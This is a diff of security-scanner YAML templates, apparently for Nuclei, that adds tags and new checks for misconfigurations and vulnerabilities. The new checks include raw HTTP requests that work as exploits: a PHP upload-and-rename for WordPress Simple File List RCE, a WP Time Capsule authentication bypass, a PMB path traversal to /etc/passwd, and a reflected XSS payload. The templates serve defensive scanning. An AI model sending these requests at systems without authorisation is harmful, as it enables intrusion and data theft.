@ -1,9 +1,10 @@
id: larvel-debug-error
id: laravel-debug-error
info:
name: Larvel Debug Method Enabled
author: dhiyaneshDK
severity: medium
tags: debug,laravel
requests:
- method: GET

1
misconfiguration/linkerd-ssrf-detect.yaml
View File

@ -19,6 +19,7 @@ info:
name: Linkerd SSRF detection
author: dudez
severity: info
tags: ssrf,linkerd
requests:
- method: GET

1
misconfiguration/manage-engine-ad-search.yaml
View File

@ -5,6 +5,7 @@ info:
author: PR3R00T
severity: high
description: Manage Engine AD Manager service can be configured to allow anonymous users to browse the AD list remotely.
tags: unauth
requests:
- method: GET

1
misconfiguration/mikrotik-graph.yaml
View File

@ -5,6 +5,7 @@ info:
author: dhiyaneshDK
severity: low
reference: https://www.exploit-db.com/ghdb/4395
tags: unauth
requests:
- method: GET

1
misconfiguration/misconfigured-docker.yaml
View File

@ -5,6 +5,7 @@ info:
author: dhiyaneshDK
severity: critical
reference: https://madhuakula.com/content/attacking-and-auditing-docker-containers-using-opensource/attacking-docker-containers/misconfiguration.html
tags: docker,unauth
requests:
- method: GET

1
misconfiguration/nginx-status.yaml
View File

@ -4,6 +4,7 @@ info:
name: Nginx Status Page
author: dhiyaneshDK
severity: low
tags: config,nginx
requests:
- method: GET

21
misconfiguration/panasonic-network-management.yaml Normal file
View File

@ -0,0 +1,21 @@
id: panasonic-network-management
info:
name: Panasonic Network Camera Management System
author: dhiyaneshDk
severity: medium
reference: https://www.exploit-db.com/ghdb/6487
requests:
- method: GET
path:
- "{{BaseURL}}/config/cam_portal.cgi"
matchers-condition: and
matchers:
- type: word
words:
- '<TITLE>Panasonic Network Camera Management System</TITLE>'
part: body
- type: status
status:
- 200

1
misconfiguration/php-errors.yaml
View File

@ -4,6 +4,7 @@ info:
name: PHP errors
author: w4cky_
severity: info
tags: debug
requests:
- method: GET

1
misconfiguration/php-fpm-status.yaml
View File

@ -4,6 +4,7 @@ info:
name: PHP-FPM Status
author: geeknik
severity: info
tags: config
requests:
- method: GET

1
misconfiguration/phpmyadmin-wooyun.yaml
View File

@ -6,6 +6,7 @@ info:
severity: high
reference: https://rj45mp.github.io/phpMyAdmin-WooYun-2016-199433/
tags: phpmyadmin,lfi
requests:
- raw:
- |

4
misconfiguration/put-method-enabled.yaml
View File

@ -4,8 +4,8 @@ info:
name: PUT method enabled
author: xElkomy
severity: high
# https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled
reference: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled
tags: injection
requests:
- raw:

1
misconfiguration/rack-mini-profiler.yaml
View File

@ -4,6 +4,7 @@ info:
name: rack-mini-profiler environmnet information discloure
author: vzamanillo
severity: high
tags: config,debug
requests:
- method: GET

2
misconfiguration/salesforce-aura.yaml
View File

@ -5,6 +5,7 @@ info:
author: aaron_costello (@ConspiracyProof)
severity: info
reference: https://www.enumerated.de/index/salesforce
tags: aura,unauth,salesforce
requests:
- method: POST
@ -12,6 +13,7 @@ requests:
- "{{BaseURL}}/aura"
- "{{BaseURL}}/s/sfsites/aura"
- "{{BaseURL}}/sfsites/aura"
body: "{}"
matchers:

2
misconfiguration/server-status-localhost.yaml
View File

@ -4,10 +4,10 @@ info:
name: Server Status Disclosure
author: pd-team & geeknik
severity: low
tags: config
requests:
- method: GET
# Example of sending some headers to the servers
headers:
X-Client-IP: "127.0.0.1"
X-Remote-IP: "127.0.0.1"

1
misconfiguration/shell-history.yaml
View File

@ -5,6 +5,7 @@ info:
author: pentest_swissky & geeknik
severity: low
description: Discover history for bash, ksh, sh, and zsh
tags: config
requests:
- method: GET

1
misconfiguration/sidekiq-dashboard.yaml
View File

@ -4,6 +4,7 @@ info:
name: sidekiq-dashboard
author: dhiyaneshDK
severity: medium
tags: unauth
requests:
- method: GET

1
misconfiguration/solr-query-dashboard.yaml
View File

@ -5,6 +5,7 @@ info:
author: dhiyaneshDK
severity: High
reference: https://www.exploit-db.com/ghdb/5856
tags: solr,unauth
requests:
- method: GET

4
misconfiguration/symfony-debugmode.yaml
View File

@ -4,7 +4,9 @@ info:
author: organiccrap
severity: high
description: todo
# reference: https://github.com/synacktiv/eos
reference: https://github.com/synacktiv/eos
tags: symfony,debug
requests:
- method: GET
path:

1
misconfiguration/tomcat-scripts.yaml
View File

@ -4,6 +4,7 @@ info:
name: Detect Tomcat Exposed Scripts
author: Co0nan
severity: info
tags: apache
requests:
- method: GET

1
misconfiguration/unauthenticated-airflow.yaml
View File

@ -4,6 +4,7 @@ info:
name: Unauthenticated Airflow Instance
author: dhiyaneshDK
severity: high
tags: apache,airflow,unauth
requests:
- method: GET

1
misconfiguration/unauthenticated-mongo-express.yaml
View File

@ -5,6 +5,7 @@ info:
author: dhiyaneshDK
severity: high
reference: https://www.exploit-db.com/ghdb/5684
tags: mongo,unauth
requests:
- method: GET

1
misconfiguration/unauthenticated-nacos-access.yaml
View File

@ -5,6 +5,7 @@ info:
author: taielab & @pikpikcu
severity: critical
issues: https://github.com/alibaba/nacos/issues/4593
tags: nacos,unauth
requests:
- method: GET

1
misconfiguration/unauthenticated-prtg.yaml
View File

@ -5,6 +5,7 @@ info:
author: dhiyaneshDK
severity: high
reference: https://www.exploit-db.com/ghdb/5808
tags: config,unauth
requests:
- method: GET

4
misconfiguration/wamp-xdebug-detect.yaml
View File

@ -4,8 +4,8 @@ info:
name: WAMP xdebug
author: e_schultze_
severity: info
# Inspired on https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py
# Goal: detect if xdebug.remote_connect_back is enabled
reference: https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py
tags: debug,config
requests:
- method: GET

1
misconfiguration/zenphoto-installation-sensitive-info.yaml
View File

@ -6,6 +6,7 @@ info:
severity: medium
description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive
information disclosure
tags: unauth
requests:
- method: GET

20
technologies/openam-detection.yaml Normal file
View File

@ -0,0 +1,20 @@
id: openam-detection
info:
name: Detect openam
author: melbadry9 & xelkomy
severity: info
description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email.
reference: https://blog.cybercastle.io/ldap-injection-in-openam/
requests:
- method: GET
path:
- "{{BaseURL}}/openam/ui/PWResetUserValidation"
- "{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation"
- "{{BaseURL}}/ui/PWResetUserValidation"
matchers:
- type: dsl
dsl:
- 'contains(body, "jato.pageSession") && status_code==200'

25
technologies/thinkcmf-detection.yaml Normal file
View File

@ -0,0 +1,25 @@
id: thinkcmf-detection
info:
name: ThinkCMF Detection
author: pikpikcu
severity: info
tags: thinkcmf
requests:
- method: GET
path:
- "{{BaseURL}}/"
matchers-condition: and
matchers:
- type: word
words:
- "X-Powered-By: ThinkCMF"
part: header
condition: and
- type: status
status:
- 200

9
vulnerabilities/other/apache-flink-unauth-rce.yaml
View File

@ -4,12 +4,11 @@ info:
name: Apache Flink Unauth RCE
author: pikpikcu
severity: critical
reference: https://github.com/LandGrey/flink-unauth-rce
tags: apache,flink,rce
# reference:
# https://www.exploit-db.com/exploits/48978
# https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3
reference: |
- https://www.exploit-db.com/exploits/48978
- https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3
- https://github.com/LandGrey/flink-unauth-rce
requests:
- raw:

2
vulnerabilities/other/bullwark-momentum-lfi.yaml
View File

@ -5,8 +5,8 @@ info:
author: pikpikcu
severity: high
tags: bullwark,lfi
reference: https://www.exploit-db.com/exploits/47773
# reference:-https://www.exploit-db.com/exploits/47773
# Vendor Homepage: http://www.bullwark.net/
# Version : Bullwark Momentum Series Web Server JAWS/1.0
# Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24

31
vulnerabilities/other/parentlink-xss.yaml Normal file
View File

@ -0,0 +1,31 @@
id: parentlink-xss
info:
name: Blackboard ParentLink Reflected XSS
author: r3naissance
severity: medium
tags: blackboard,parentlink,xss
reference: https://help.blackboard.com/Community_Engagement/Administrator/Release_Notes
requests:
- method: GET
path:
- '{{BaseURL}}/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
- '{{BaseURL}}/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
matchers-condition: and
matchers:
- type: word
words:
- '<img src=c onerror=alert(8675309)>'
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200

21
vulnerabilities/other/pmb-local-file-disclosure.yaml Normal file
View File

@ -0,0 +1,21 @@
id: pmb-local-file-disclosure
info:
name: PMB 5.6 - 'chemin' Local File Disclosure
author: dhiyaneshDk
severity: high
reference: https://www.exploit-db.com/exploits/49054
requests:
- method: GET
path:
- '{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "root:x:0"

1
vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
View File

@ -26,7 +26,6 @@ requests:
- '{{BaseURL}}/wp-config.php~'
- '{{BaseURL}}/wp-config.php.orig'
- '{{BaseURL}}/wp-config.php.original'
- '{{BaseURL}}/wp-license.php?file=../..//wp-config'
- '{{BaseURL}}/_wpeprivate/config.json'
matchers-condition: and
matchers:

50
vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml Normal file
View File

@ -0,0 +1,50 @@
id: wordpress-auth-bypass-wptimecapsule
info:
name: WordPress WP Time Capsule Authentication Bypass
author: princechaddha
severity: critical
reference: https://github.com/SECFORCE/WPTimeCapsulePOC
tags: wordpress,auth-bypass,wp-plugin
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
IWP_JSON_PREFIX
- |
GET /wp-admin/index.php HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- '<div id="adminmenumain" role="navigation" aria-label="Main menu">'
- "<h1>Dashboard</h1>"
part: body
condition: and
- type: word
words:
- 'text/html'
part: header
- type: status
status:
- 200
extractors:
- type: regex
part: header
regex:
- "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"

74
vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml Normal file
View File

@ -0,0 +1,74 @@
id: wordpress-rce-simplefilelist
info:
name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE
author: princechaddha
severity: critical
reference: https://wpscan.com/vulnerability/10192
tags: wordpress,wp-plugin,rce
requests:
- raw:
- |
POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Connection: close
Content-Length: 693
Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition: form-data; name="eeSFL_ID"
1
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition: form-data; name="eeSFL_FileUploadDir"
/wp-content/uploads/simple-file-list/
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition: form-data; name="eeSFL_Timestamp"
1587258885
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition: form-data; name="eeSFL_Token"
ba288252629a5399759b6fde1e205bc2
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition: form-data; name="file"; filename="nuclei.png"
Content-Type: image/png
<?php echo "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?>
--6985fa39c0698d07f6d418b37388e1b2--
- |
POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.25.1
Accept: */*
Connection: close
X-Requested-With: XMLHttpRequest
Content-Length: 81
Content-Type: application/x-www-form-urlencoded
eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php
- |
GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Connection: close
matchers-condition: and
matchers:
- type: word
words:
- 'Nuclei - Open-source project (github.com/projectdiscovery/nuclei)'
part: body
- type: word
words:
- 'text/html'
part: header
- type: status
status:
- 200

32
vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml Normal file
View File

@ -0,0 +1,32 @@
id: wordpress-total-upkeep-backup-download
info:
name: WordPress Total Upkeep Database and Files Backup Download
author: princechaddha
severity: high
reference: https://www.exploit-db.com/exploits/49252
tags: wordpress,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/boldgrid-backup/cron/restore-info.json"
matchers-condition: and
matchers:
- type: word
words:
- "application/json"
part: header
- type: word
words:
- '"filepath"'
- '/wp-content/boldgrid_backup_'
condition: and
part: body
- type: status
status:
- 200

3
workflows/springboot-workflow.yaml
View File

@ -22,5 +22,4 @@ workflows:
- template: vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
- template: vulnerabilities/springboot/springboot-h2-db-rce.yaml
- template: cves/2018/CVE-2018-1271.yaml
- template: cves/2018/CVE-2018-1271.yaml
- template: cves/2020/CVE-2020-5410.yaml
- template: cves/2020/CVE-2020-5410.yaml

13
workflows/thinkcmf-workflow.yaml Normal file
View File

@ -0,0 +1,13 @@
id: thinkcmf-workflow
info:
name: ThinkCMF Security Checks
author: pdteam
description: A simple workflow that runs all ThinkCMF related nuclei templates on a given target.
tags: workflow
workflows:
- template: technologies/thinkcmf-detection.yaml
subtemplates:
- template: vulnerabilities/thinkcmf/thinkcmf-lfi.yaml
- template: vulnerabilities/thinkcmf/thinkcmf-rce.yaml

12
workflows/wordpress-workflow.yaml
View File

@ -5,15 +5,13 @@ info:
description: A simple workflow that runs all wordpress related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: wordpress
subtemplates:
- template: cves/2018/CVE-2018-3810.yaml
- template: cves/2019/CVE-2019-6112.yaml
- template: cves/2019/CVE-2019-6715.yaml
- template: cves/2019/CVE-2019-9978.yaml
@ -22,9 +20,15 @@ workflows:
- template: cves/2019/CVE-2019-19985.yaml
- template: cves/2019/CVE-2019-20141.yaml
- template: cves/2020/CVE-2020-11738.yaml
- template: cves/2020/CVE-2020-24186.yaml
- template: cves/2020/CVE-2020-24312.yaml
- template: cves/2020/CVE-2020-25213.yaml
- template: cves/2020/CVE-2020-13700.yaml
- template: cves/2020/CVE-2020-14092.yaml
- template: cves/2020/CVE-2020-35951.yaml
- template: vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml
- template: vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
- template: vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml
- template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
- template: vulnerabilities/wordpress/sassy-social-share.yaml
- template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
@ -46,4 +50,4 @@ workflows:
- template: vulnerabilities/wordpress/wp-enabled-registration.yaml
- template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml
- template: vulnerabilities/wordpress/wp-uploads-listing.yaml
- template: vulnerabilities/wordpress/wp-license-file.yaml
- template: vulnerabilities/wordpress/wp-license-file.yaml